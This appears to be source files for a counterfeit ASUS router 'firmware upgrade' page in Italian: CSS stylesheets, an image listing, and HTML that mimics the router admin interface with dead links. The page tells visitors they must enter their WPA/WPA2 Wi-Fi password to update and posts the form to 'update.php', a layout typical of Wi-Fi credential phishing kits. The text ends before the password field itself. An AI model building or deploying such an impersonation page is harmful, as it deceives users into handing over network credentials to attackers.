.dr_sweet_advise{
|
||||
filter:alpha(opacity=90);
|
||||
opacity:.90;
|
||||
-webkit-border-radius: 10px;
|
||||
-moz-border-radius: 10px;
|
||||
border-radius: 10px;
|
||||
behavior: url(/PIE.htc);
|
||||
border-radius: 10px 10px 10px 10px;
|
||||
border: 0px;
|
||||
/*margin-top:200px;*/
|
||||
width:500px;
|
||||
font-size:20px;
|
||||
color:#FFFFFF;
|
||||
background-color:#000000;
|
||||
font-family:Arial, Helvetica, sans-serif;
|
||||
position:absolute;
|
||||
margin:5px 35% 5px;
|
||||
}
|
||||
|
||||
.loadingBarBlock{
|
||||
-webkit-border-radius: 10px;
|
||||
-moz-border-radius: 10px;
|
||||
behavior: url(/PIE.htc);
|
||||
border-radius: 10px 10px 10px 10px;
|
||||
border: 0px;
|
||||
width:450px;
|
||||
font-size:12px;
|
||||
font-family:Verdana, Arial, Helvetica, sans-serif;
|
||||
color:#FFFFFF;
|
||||
background-color:#000000;
|
||||
position:absolute;
|
||||
margin:5px 33% 5px;
|
||||
}
|
||||
|
||||
.hackiframe /* iframe for Hack IE 6.0 to avoid select menu over DIV layer. */
|
||||
{
|
||||
display:none;/*sorry for IE5*/
|
||||
display/**/:block;/*sorry for IE5*/
|
||||
position:absolute;/*must have*/
|
||||
top:0;/*must have*/
|
||||
left:0;/*must have*/
|
||||
z-index:-1;/*must have*/
|
||||
filter:mask();/*must have*/
|
||||
width:3000px;/*must have for any big value*/
|
||||
height:3000px/*must have for any big value*/;
|
||||
}
|
||||
|
||||
.dr{
|
||||
z-index:10;
|
||||
position: absolute;
|
||||
margin-top:0px;
|
||||
margin-left:0px;
|
||||
width:36px;
|
||||
height:36px;
|
||||
float:right;
|
||||
background: url(/../images/drsurf.png) no-repeat;
|
||||
}
|
||||
.dr a:link{ cursor:pointer; }
|
||||
.dr a:hover{ cursor:pointer; }
|
||||
|
||||
.drsword{
|
||||
z-index:10;
|
||||
position: absolute;
|
||||
margin-top:0px;
|
||||
margin-left:-148px;
|
||||
background-color:#FFFFFF;
|
||||
font-family:Verdana, Arial, Helvetica, sans-serif;
|
||||
font-size:11px;
|
||||
width:120px;
|
||||
border:1px solid #999;
|
||||
padding:5px;
|
||||
visibility:hidden;
|
||||
}
|
||||
.wordarrow{
|
||||
z-index:10;
|
||||
position: absolute;
|
||||
margin-top:10px;
|
||||
margin-left:-17px;
|
||||
width:19px;
|
||||
height:20px;
|
||||
visibility:hidden;
|
||||
}
|
||||
|
||||
.statusframe{
|
||||
display:none;
|
||||
width: 180px;
|
||||
height:400px;
|
||||
}
|
||||
|
||||
.top_ssid{
|
||||
background:transparent;
|
||||
border:0px;
|
||||
font-size:11px;
|
||||
font-family:Verdana, Arial, Helvetica, sans-serif;
|
||||
width:150px;
|
||||
}
|
||||
.map_ssid{
|
||||
background:transparent;
|
||||
border:0px;
|
||||
font-size:10px;
|
||||
font-family:Verdana, Arial, Helvetica, sans-serif;
|
||||
width:110px;
|
||||
}
|
||||
.time{
|
||||
border:0px solid #333;
|
||||
line-height:19px;
|
||||
height:19px;
|
||||
}
|
||||
.title_link{
|
||||
cursor:pointer;
|
||||
line-height:19px;
|
||||
height:19px;
|
||||
margin-left:5px;
|
||||
margin-right:5px;
|
||||
text-decoration: underline;
|
||||
font-family:Lucida Console;
|
||||
font-weight: bolder;
|
||||
white-space: nowrap;
|
||||
}
|
||||
/*========================== router Tab =================================*/
|
||||
.r1{
|
||||
padding-top:3px;
|
||||
padding-bottom:0px;
|
||||
padding-left:10px;
|
||||
padding-right:10px;
|
||||
height:25px;
|
||||
width:50px;
|
||||
background:url(../images/tag-router2.gif) 0 bottom no-repeat;
|
||||
font-weight:bold;
|
||||
font-family :Verdana;
|
||||
font-size : 12px;
|
||||
color:#000000
|
||||
}
|
||||
|
||||
.r2{
|
||||
padding-top:3px;
|
||||
padding-bottom:0px;
|
||||
padding-left:10px;
|
||||
padding-right:10px;
|
||||
height:25px;
|
||||
width:50px;
|
||||
background:url(../images/tag-router1.gif) 0 bottom no-repeat;
|
||||
font-weight:bold;
|
||||
font-family:Verdana;
|
||||
font-size:12px;
|
||||
color:#b7e1f7;
|
||||
text-decoration:none;
|
||||
cursor:pointer;
|
||||
}
|
||||
|
||||
.r2 a:link{font-family :Verdana;font-size : 12px;color:#6b8fa3;text-decoration:none;}
|
||||
.r2 a:visited{font-family :Verdana;font-size : 12px;color:#6b8fa3;text-decoration:none;}
|
||||
.r2 a:active{font-family :Verdana;font-size : 12px;color:#6b8fa3;text-decoration:none;}
|
||||
.r2 a:hover{font-family :Verdana;font-size : 12px;color:#ffffff;position:relative;top:1px;left:1px}
|
||||
|
||||
|
||||
/* ============ new ui =============*/
|
||||
.titlebtn {
|
||||
background: transparent url(../images/New_ui/btn.png) no-repeat scroll right top;
|
||||
color: White;
|
||||
display: block;
|
||||
float: left;
|
||||
height: 34px;
|
||||
padding-right: 10px;
|
||||
margin-right: 10px;
|
||||
text-decoration: none;
|
||||
width:136px;
|
||||
}
|
||||
.titlebtn span {
|
||||
background: transparent url(../images/New_ui/btnspan.png) no-repeat;
|
||||
display: block;
|
||||
padding: 5px 1px 5px 11px;
|
||||
line-height: 24px;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
|
||||
.titlebtn:hover {
|
||||
background-position: right -34px;
|
||||
}
|
||||
.titlebtn:hover span {
|
||||
background-position: left -34px;
|
||||
}
|
||||
.titlebtn:active {
|
||||
background-position: right -68px;
|
||||
outline: none;
|
||||
}
|
||||
.titlebtn:active span {
|
||||
background-position: left -68px;
|
||||
}
|
||||
|
||||
.titledropdownbtn {
|
||||
background-image:url(../images/dropdown_bt.png);
|
||||
font-size:12px;
|
||||
color:#FFFFFF;
|
||||
text-decoration:none;
|
||||
width:147px;
|
||||
height:33px;
|
||||
line-height:33px;
|
||||
}
|
||||
|
||||
.titledropdownbtn:hover{
|
||||
background-image:url(../images/dropdown_btover.png);
|
||||
}
|
||||
|
||||
.titledown{
|
||||
font:Arial, Helvetica, sans-serif;
|
||||
color:#FFFFFF;
|
||||
font-size:12px;
|
||||
}
|
||||
.titledown a:link{
|
||||
color:#FFFFFF;
|
||||
}
|
||||
.titledown:hover{
|
||||
color:#FFFFFF;
|
||||
}
|
||||
|
||||
.titledownbt{
|
||||
font:Arial, Helvetica, sans-serif;
|
||||
padding-left:2px;
|
||||
margin-left:2px;
|
||||
color:#FFFFFF;
|
||||
font-size:12px;
|
||||
/*text-decoration:underline;*/
|
||||
}
|
||||
|
||||
/*Add by Viz*/
|
||||
.titledownbtntext{
|
||||
font:Arial, Helvetica, sans-serif;
|
||||
color:#FFFFFF;
|
||||
font-size:12px;
|
||||
text-decoration:none;
|
||||
text-align:center;
|
||||
width:122px;
|
||||
}
|
||||
|
||||
.index_status{
|
||||
font:Impact;
|
||||
font-size:20px;
|
||||
text-shadow: 1px 1px 0px black;
|
||||
}
|
||||
|
||||
.modelName_top{
|
||||
font:Impact;
|
||||
font-size:18px;
|
||||
text-shadow: 1px 1px 0px black;
|
||||
float:left;
|
||||
margin-top:20px;
|
||||
margin-left:-95px;
|
||||
font-weight:bolder;
|
||||
}
|
||||
.cloud_main_radius{
|
||||
-webkit-border-radius: 10px;
|
||||
-moz-border-radius: 10px;
|
||||
border-radius: 10px;
|
||||
}
|
||||
.cloud_main_radius_left{
|
||||
-webkit-border-radius: 10px 0 0 10px;
|
||||
-moz-border-radius: 10px 0 0 10px;
|
||||
border-radius: 10px 0 0 10px;
|
||||
}
|
||||
.cloud_main_radius_right{
|
||||
-webkit-border-radius: 0 10px 10px 0;
|
||||
-moz-border-radius: 0 10px 10px 0;
|
||||
border-radius: 0 10px 10px 0;
|
||||
}
|
||||
|
||||
#index_img0{
|
||||
background: url(../images/New_ui/icon_indexes.png);
|
||||
background-position: -0px -0px; width: 43px; height: 43px;
|
||||
}
|
||||
._index{
|
||||
background: url(../images/New_ui/icon_indexes.png);
|
||||
background-position: -0px -40px; width: 43px; height: 43px;
|
||||
}
|
||||
._Guest_network{
|
||||
background: url(../images/New_ui/icon_indexes.png);
|
||||
background-position: -0px -86px; width: 43px; height: 43px;
|
||||
}
|
||||
._AdaptiveQoS_Bandwidth_Monitor{
|
||||
background: url(../images/New_ui/icon_indexes.png);
|
||||
background-position: -0px -128px; width: 43px; height: 43px;
|
||||
}
|
||||
._TrafficAnalyzer_Statistic, ._QoS_EZQoS{
|
||||
background: url(../images/New_ui/icon_indexes.png);
|
||||
background-position: -0px -170px; width: 43px; height: 43px;
|
||||
}
|
||||
._AiProtection_HomeSecurity, ._ParentalControl{
|
||||
background: url(../images/New_ui/icon_indexes.png);
|
||||
background-position: -0px -216px; width: 43px; height: 43px;
|
||||
}
|
||||
._APP_Installation{
|
||||
background: url(../images/New_ui/icon_indexes.png);
|
||||
background-position: -0px -256px; width: 43px; height: 43px;
|
||||
}
|
||||
._cloud_main{
|
||||
background: url(../images/New_ui/icon_indexes.png);
|
||||
background-position: -0px -297px; width: 43px; height: 43px;
|
||||
}
|
||||
#menu_img1{
|
||||
background: url(../images/New_ui/icon_menues.png);
|
||||
background-position: -0px 4px; width: 43px; height: 40px;
|
||||
}
|
||||
#menu_img2{
|
||||
background: url(../images/New_ui/icon_menues.png);
|
||||
background-position: -0px 4px; width: 43px; height: 40px;
|
||||
}
|
||||
#menu_img3{
|
||||
background: url(../images/New_ui/icon_menues.png);
|
||||
background-position: -0px -36px; width: 43px; height: 40px;
|
||||
}
|
||||
#menu_img4{
|
||||
background: url(../images/New_ui/icon_menues.png);
|
||||
background-position: -0px -73px; width: 43px; height: 40px;
|
||||
}
|
||||
#menu_img5{
|
||||
background: url(../images/New_ui/icon_menues.png);
|
||||
background-position: -0px -73px; width: 43px; height: 40px;
|
||||
/*background-position: -0px -109px; width: 43px; height: 40px;*/
|
||||
}
|
||||
#menu_img6{
|
||||
background: url(../images/New_ui/icon_menues.png);
|
||||
background-position: -0px -109px; width: 43px; height: 40px;
|
||||
/*background-position: -0px -145px; width: 43px; height: 40px;*/
|
||||
}
|
||||
#menu_img7{
|
||||
background: url(../images/New_ui/icon_menues.png);
|
||||
background-position: -0px -145px; width: 43px; height: 40px;
|
||||
/*background-position: -0px -183px; width: 43px; height: 40px;*/
|
||||
}
|
||||
#menu_img8{
|
||||
background: url(../images/New_ui/icon_menues.png);
|
||||
background-position: -0px -183px; width: 43px; height: 40px;
|
||||
/*background-position: -0px -221px; width: 43px; height: 40px;*/
|
||||
}
|
||||
#menu_img9{
|
||||
background: url(../images/New_ui/icon_menues.png);
|
||||
background-position: -0px -221px; width: 43px; height: 40px;
|
||||
/*background-position: -0px -257px; width: 43px; height: 40px;*/
|
||||
}
|
||||
#menu_img10{
|
||||
background: url(../images/New_ui/icon_menues.png);
|
||||
background-position: -0px -257px; width: 43px; height: 40px;
|
||||
/*background-position: -0px -293px; width: 43px; height: 40px;*/
|
||||
}
|
||||
#menu_img11{
|
||||
background: url(../images/New_ui/icon_menues.png);
|
||||
background-position: -0px -293px; width: 43px; height: 40px;
|
||||
}
|
||||
#bottom_help_icon{
|
||||
background: url(../images/New_ui/bottom_help.png);
|
||||
background-position: -0px -0px; width: 19px; height: 19px;
|
||||
}
|
||||
#bottom_help_title{
|
||||
font-family:Arial, Helvetica, sans-serif;
|
||||
font-weight:bolder;
|
||||
color: #569AC7;
|
||||
}
|
||||
|
||||
.input_FAQ_table{
|
||||
margin-left:2px;
|
||||
padding-left:0.4em;
|
||||
height:23px;
|
||||
width:213px;
|
||||
line-height:23px \9; /*IE*/
|
||||
font-size:12px;
|
||||
font-family: Lucida Console;
|
||||
background-image:url(../images/New_ui/bottom_text.png);
|
||||
border-width:0;
|
||||
color:#FFFFFF;
|
||||
}
|
||||
.bottom_help_FAQ_icon{
|
||||
background: url(../images/New_ui/bottom_search.png);
|
||||
background-position: -0px -0px; width: 32px; height: 32px;
|
||||
}
|
||||
.bottom_help_FAQ_icon:hover{
|
||||
background: url(../images/New_ui/bottom_search.png);
|
||||
background-position: -0px -32px; width: 32px; height: 32px;
|
||||
}
|
||||
.bottom_help_FAQ_icon:active{
|
||||
background: url(../images/New_ui/bottom_search.png);
|
||||
background-position: -0px -64px; width: 32px; height: 32px;
|
||||
}
|
||||
#supported_link{
|
||||
margin-left:-180px;
|
||||
margin-top:-503px;
|
||||
width:165px;
|
||||
height:110px;
|
||||
background:#000;
|
||||
position:absolute;
|
||||
-webkit-border-radius: 7px;
|
||||
-moz-border-radius: 7px;
|
||||
border-radius: 7px;
|
||||
|
||||
}
|
||||
.test_text{
|
||||
margin-top:22px;
|
||||
text-align:left;
|
||||
font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
font-size:16px;
|
||||
margin-bottom:10px;
|
||||
margin-left:10px;
|
||||
}
|
||||
|
||||
.block_filter{
|
||||
background: #758084; /* Old browsers */
|
||||
background: -moz-linear-gradient(top, #758084 0%, #546166 36%, #394245 100%); /* FF3.6+ */
|
||||
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#758084), color-stop(36%,#546166), color-stop(100%,#394245)); /* Chrome,Safari4+ */
|
||||
background: -webkit-linear-gradient(top, #758084 0%,#546166 36%,#394245 100%); /* Chrome10+,Safari5.1+ */
|
||||
background: -o-linear-gradient(top, #758084 0%,#546166 36%,#394245 100%); /* Opera 11.10+ */
|
||||
background: -ms-linear-gradient(top, #758084 0%,#546166 36%,#394245 100%); /* IE10+ */
|
||||
background: linear-gradient(to bottom, #758084 0%,#546166 36%,#394245 100%); /* W3C */
|
||||
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#758084', endColorstr='#394245',GradientType=0 ); /* IE6-9 */
|
||||
border-color:#222728;
|
||||
border-width:1px;
|
||||
border-style:solid;
|
||||
}
|
||||
|
||||
.block_filter_name{
|
||||
text-align:center;
|
||||
padding-top:5px;
|
||||
color:#CCCCCC;
|
||||
font-size:14px
|
||||
}
|
||||
|
||||
.block_filter_name:hover{
|
||||
color:#FFFFFF;
|
||||
}
|
||||
|
||||
.block_filter_pressed{
|
||||
background-color:#353D40;
|
||||
border-color:#222728;
|
||||
border-width:1px;
|
||||
border-style:inset;
|
||||
}
|
||||
|
||||
.usb_count_circle {
|
||||
position: absolute;
|
||||
width: 30px;
|
||||
height: 30px;
|
||||
border-radius: 50%;
|
||||
background: #333;
|
||||
margin-top: -130px;
|
||||
margin-left: 100px;
|
||||
line-height: 33px;
|
||||
text-align: center;
|
||||
box-shadow: 1px 2px 2px #000;
|
||||
}
|
|
@ -0,0 +1,24 @@
|
|||
|
||||
.box_alert {
|
||||
color: #CC0000;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
span.error {
|
||||
color: #CC0000;
|
||||
font-size: 10px;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
progress {
|
||||
display: none;
|
||||
width: 25em;
|
||||
}
|
||||
|
||||
progress.update {
|
||||
display: inline-block;
|
||||
-webkit-appearance: none;
|
||||
border: none;
|
||||
}
|
||||
|
||||
|
After Width: | Height: | Size: 2.9 KiB |
After Width: | Height: | Size: 886 B |
After Width: | Height: | Size: 1.4 KiB |
After Width: | Height: | Size: 7.0 KiB |
After Width: | Height: | Size: 3.3 KiB |
After Width: | Height: | Size: 993 B |
After Width: | Height: | Size: 4.5 KiB |
After Width: | Height: | Size: 1.3 KiB |
After Width: | Height: | Size: 1.2 KiB |
After Width: | Height: | Size: 1.2 KiB |
After Width: | Height: | Size: 4.1 KiB |
After Width: | Height: | Size: 4.2 KiB |
After Width: | Height: | Size: 99 B |
After Width: | Height: | Size: 976 B |
After Width: | Height: | Size: 370 B |
After Width: | Height: | Size: 232 B |
After Width: | Height: | Size: 381 B |
After Width: | Height: | Size: 624 B |
After Width: | Height: | Size: 12 KiB |
After Width: | Height: | Size: 14 KiB |
After Width: | Height: | Size: 287 B |
After Width: | Height: | Size: 30 KiB |
After Width: | Height: | Size: 177 B |
After Width: | Height: | Size: 26 KiB |
After Width: | Height: | Size: 1.0 KiB |
After Width: | Height: | Size: 408 B |
After Width: | Height: | Size: 1.6 KiB |
After Width: | Height: | Size: 22 KiB |
After Width: | Height: | Size: 19 KiB |
After Width: | Height: | Size: 8.4 KiB |
After Width: | Height: | Size: 1.6 KiB |
After Width: | Height: | Size: 735 B |
After Width: | Height: | Size: 141 B |
After Width: | Height: | Size: 143 B |
|
@ -0,0 +1,507 @@
|
|||
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="">
|
||||
<head>
|
||||
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|
||||
<meta http-equiv="Pragma" content="no-cache">
|
||||
<meta http-equiv="Expires" content="-1">
|
||||
|
||||
<link rel="shortcut icon" type="image/png" href="images/favicon.ico"/>
|
||||
<link rel="stylesheet" type="text/css" href="css/index_style.css">
|
||||
<link rel="stylesheet" type="text/css" href="css/form_style.css">
|
||||
<link rel="stylesheet" type="text/css" href="css/update.css">
|
||||
|
||||
<title>ASUS Wireless Router - Firmware Upgrade</title>
|
||||
<body>
|
||||
|
||||
<div id="TopBanner">
|
||||
<div class="banner1" align="center">
|
||||
<img src="images/New_ui/asustitle.png" width="218" height="54" align="left">
|
||||
<div style="margin-top:13px;margin-left:-90px;*margin-top:0px;*margin-left:0px;" align="center"></div>
|
||||
<a href="#">
|
||||
<div style="margin-top:13px;margin-left:25px; *width:136px;" class="titlebtn" align="center"><span>Logout</span>
|
||||
</div>
|
||||
</a>
|
||||
<ul class="navigation">
|
||||
<li>
|
||||
<dl>
|
||||
<a href="#">
|
||||
<dt id="selected_lang">Italiano</dt>
|
||||
</a>
|
||||
</dl>
|
||||
</li>
|
||||
</ul>
|
||||
</div>
|
||||
<table width="998" border="0" align="center" cellpadding="0" cellspacing="0" class="statusBar">
|
||||
<tbody><tr>
|
||||
<td background="images/New_ui/midup_bg.png" height="179" valign="top"><table width="764" border="0" cellpadding="0" cellspacing="0" height="35px" style="margin-left:230px;">
|
||||
<tbody><tr>
|
||||
<td valign="center" class="titledown" width="auto"><span style="font-family:Verdana, Arial, Helvetica, sans-serif;">Operation Mode:<span class="title_link" style="text-decoration: none;" id="op_link"><a href="#" style="color:white"><span id="sw_mode_span" style="text-decoration: underline;">Wireless router</span></a></span>
|
||||
<span style="font-family:Verdana, Arial, Helvetica, sans-serif;">Firmware Version:<a href="#" style="color:white;"><span id="firmver" class="title_link">3.0.0.4.378_4980</span></a>
|
||||
|
||||
</span></span></span></td>
|
||||
<td width="30"><div id="notification_desc" class=""></div></td>
|
||||
<td width="30" id="notification_status1" class="notification_on1"><div id="notification_status" class="notification_on"></div></td>
|
||||
<td width="30"><div id="guestnetwork_status" class="guestnetworkstatusoff"></div></td>
|
||||
<td width="30"><div id="connect_status" class="connectstatuson"></div></td>
|
||||
<td width="30"><div id="usb_status" class="usbstatuson"></div></td>
|
||||
<td width="30"><div id="printer_status" class="printstatusoff"></div></td>
|
||||
<td width="17"></td>
|
||||
</tr></tbody></table></td></tr></tbody></table>
|
||||
</div>
|
||||
|
||||
<iframe name="hidden_frame" id="hidden_frame" src="" width="0" height="0" frameborder="0"></iframe>
|
||||
|
||||
|
||||
<table class="content" align="center" cellpadding="0" cellspacing="0">
|
||||
<tbody><tr>
|
||||
<td width="17"> </td>
|
||||
|
||||
<td valign="top" width="202">
|
||||
<div id="mainMenu">
|
||||
<div class="m_qis_r" style="margin-top:-170px;cursor:pointer;">
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<div id="index_img0"></div>
|
||||
</td>
|
||||
<td>
|
||||
<div style="font-weight: bolder;">Impostazioni Rapide</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div class="m0_r" style="margin-top:10px;" id="option0">
|
||||
<table width="192px" height="37px">
|
||||
<tbody>
|
||||
<tr>
|
||||
<td style="font-weight: bolder; text-align: center;">Generale</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div class="menu" id="_index" style="cursor:pointer;">
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<div class="_index"></div>
|
||||
</td>
|
||||
<td>
|
||||
<div id="menu_string" style="width:120px; font-weight: bolder;">Rete</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div class="menu" id="_Guest_network" style="cursor:pointer;">
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<div class="_Guest_network"></div>
|
||||
</td>
|
||||
<td>
|
||||
<div id="menu_string" style="width:120px; font-weight: bolder;">Rete Ospite</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div class="menu" id="_AiProtection_HomeSecurity" style="cursor:pointer;">
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<div class="_AiProtection_HomeSecurity"></div>
|
||||
</td>
|
||||
<td>
|
||||
<div id="menu_string" style="width:120px; font-weight: bolder;">Protezione AI</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div class="menu" id="_AdaptiveQoS_Bandwidth_Monitor" style="cursor:pointer;">
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<div class="_AdaptiveQoS_Bandwidth_Monitor"></div>
|
||||
</td>
|
||||
<td>
|
||||
<div id="menu_string" style="width:120px;font-weight: bolder;">Adaptive QoS</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div class="menu" id="_TrafficAnalyzer_Statistic" style="cursor:pointer;">
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<div class="_TrafficAnalyzer_Statistic"></div>
|
||||
</td>
|
||||
<td>
|
||||
<div id="menu_string" style="width:120px;font-weight: bolder;">Analisi Traffico</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div class="menu" id="_APP_Installation" style="cursor:pointer;">
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<div class="_APP_Installation"></div>
|
||||
</td>
|
||||
<td>
|
||||
<div id="menu_string" style="width:120px;font-weight: bolder;">Collegamento USB</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div class="menu" id="_cloud_main" style="cursor:pointer;">
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<div class="_cloud_main"></div>
|
||||
</td>
|
||||
<td>
|
||||
<div id="menu_string" style="width:120px;font-weight: bolder;">AiCloud 2.0</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div class="m0_r" id="option0">
|
||||
<table width="192px" height="37px">
|
||||
<tbody>
|
||||
<tr>
|
||||
<td style="font-weight: bolder; text-align: center">Impostazioni Avanzate</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
</div>
|
||||
<div id="subMenu">
|
||||
<div class="menu" id="option1" style="cursor:pointer;">
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<div id="menu_img1"></div>
|
||||
</td>
|
||||
<td>
|
||||
<div id="option_str1" style="width:120px; font-weight: bolder;">Wireless</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div class="menu" id="option3" style="cursor:pointer;">
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<div id="menu_img3"></div>
|
||||
</td>
|
||||
<td>
|
||||
<div id="option_str1" style="width:120px;font-weight: bolder;">LAN</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div class="menu" id="option4" style="cursor:pointer;">
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<div id="menu_img4"></div>
|
||||
</td>
|
||||
<td>
|
||||
<div id="option_str1" style="width:120px;font-weight: bolder;">WAN</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div class="menu" id="option6" style="cursor:pointer;">
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<div id="menu_img6"></div>
|
||||
</td>
|
||||
<td>
|
||||
<div id="option_str1" style="width:120px;font-weight: bolder;">IPv6</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div class="menu" id="option7" style="cursor:pointer;">
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<div id="menu_img7"></div>
|
||||
</td>
|
||||
<td>
|
||||
<div id="option_str1" style="width:120px;font-weight: bolder;">VPN</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div class="menu" id="option8" style="cursor:pointer;">
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<div id="menu_img8"></div>
|
||||
</td>
|
||||
<td>
|
||||
<div id="option_str1" style="width:120px;font-weight: bolder;">Firewall</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div class="menu_clicked" id="option9">
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<div id="menu_img9"></div>
|
||||
</td>
|
||||
<td>
|
||||
<div id="option_str1" style="width:120px;font-weight: bolder;">Amministrazione</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div class="menu" id="option10" style="cursor:pointer;">
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<div id="menu_img10"></div>
|
||||
</td>
|
||||
<td>
|
||||
<div id="option_str1" style="width:120px;font-weight: bolder;">Log di Sistema</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<div class="menu" id="option11" style="cursor:pointer;">
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<div id="menu_img11"></div>
|
||||
</td>
|
||||
<td>
|
||||
<div id="option_str1" style="width:120px;font-weight: bolder;">Network Tools</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
</div>
|
||||
</td>
|
||||
|
||||
<td valign="top">
|
||||
<div id="tabMenu" class="submenuBlock"><table border="0" cellspacing="0" cellpadding="0"><tbody><tr>
|
||||
<td><div class="tab" style="cursor:pointer;"><span><table><tbody><tr><td>Modo Operativo</td></tr></tbody></table></span></div></td><td>
|
||||
<div class="tab" style="cursor:pointer;">
|
||||
<span>
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>System</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</span>
|
||||
</div>
|
||||
</td>
|
||||
<td>
|
||||
<div class="tabclick">
|
||||
<span>
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>Aggiornamento Firmware</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</span>
|
||||
</div>
|
||||
</td>
|
||||
<td>
|
||||
<div class="tab" style="cursor:pointer;">
|
||||
<span>
|
||||
<table>
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>Ripristina/Salva/Carica Impostazioni</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</span>
|
||||
</div>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<!--===================================Beginning of Main Content===========================================-->
|
||||
<table width="98%" border="0" align="left" cellpadding="0" cellspacing="0">
|
||||
<tbody><tr>
|
||||
<td align="left" valign="top">
|
||||
|
||||
<table width="760px" border="0" cellpadding="5" cellspacing="0" class="FormTitle" id="FormTitle" style="height: 888px;">
|
||||
<tbody>
|
||||
<tr>
|
||||
<td bgcolor="#4D595D" valign="top">
|
||||
<div> </div>
|
||||
<div class="formfonttitle">Amministrazione - Aggiornamento Firmware</div>
|
||||
<div style="margin-left:5px;margin-top:10px;margin-bottom:10px"><img src="./images/New_ui/export/line_export.png"></div>
|
||||
<p>Un aggiornamento firmware è disponibile. Per avere la miglior esperienza, ASUS consiglia fortemente di aggiornare il vostro router all'ultima versione del firmware.</p>
|
||||
<div class="formfontdesc"><strong>Nota:</strong>
|
||||
<ol>
|
||||
<li>L'ultima versione del firmware include tutti gli aggiornamenti della versione precedente.</li>
|
||||
<li>Per scaricare e aggiornare il firmware è necessario inserire la password WPA/WPA2 e premere il tasto AGGIORNA per procedere.</li>
|
||||
<li>
|
||||
<p style="color: #FF5656; font-weight: bolder;">Il download e l'aggiornamento del firmware può richiedere alcuni minuti. Durante l'aggiornamento non spegnere il router nè chiudere il browser.</p>
|
||||
</li>
|
||||
</ol>
|
||||
</div>
|
||||
<br>
|
||||
<form id="updateform" method="post" action="update.php">
|
||||
<table width="100%" border="1" align="center" cellpadding="4" cellspacing="0" bordercolor="#6b8fa3" class="FormTable">
|
||||
<tbody>
|
||||
|
||||
<tr id="sig_ver_field">
|
||||
<th>Signature Version</th>
|
||||
<td id="sig_ver_word">1.038</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<th>Versione Firmware Corrente</th>
|
||||
<td>3.0.0.4.378_4980-g8c12415</td>
|
||||
</tr>
|
